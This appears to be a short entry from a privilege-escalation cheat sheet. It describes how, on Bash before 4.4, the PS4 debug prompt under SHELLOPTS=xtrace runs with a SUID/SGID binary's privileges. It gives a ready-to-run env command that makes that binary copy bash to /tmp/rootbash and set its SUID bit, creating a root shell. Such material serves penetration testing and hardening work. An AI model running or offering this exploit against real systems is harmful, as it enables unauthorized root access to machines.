Warning

This only works on versions of Bash before v4.4!

When Bash is in debugging mode (SHELLOPTS=xtrace), the $PS4 prompt is used to display debugging information.

It would appear that this prompt somehow inherits the permissions of the executable being run. This includes SUID/SGID permissions (at least for Bash < 4.4)!

If you have access to a SUID/SGID executable, this can be abused to create root shells:

env -i \
SHELLOPTS=xtrace \
PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' \
/path/to/suid/executable

Again, this only works if the calling application is relying on the current shell for helper execution.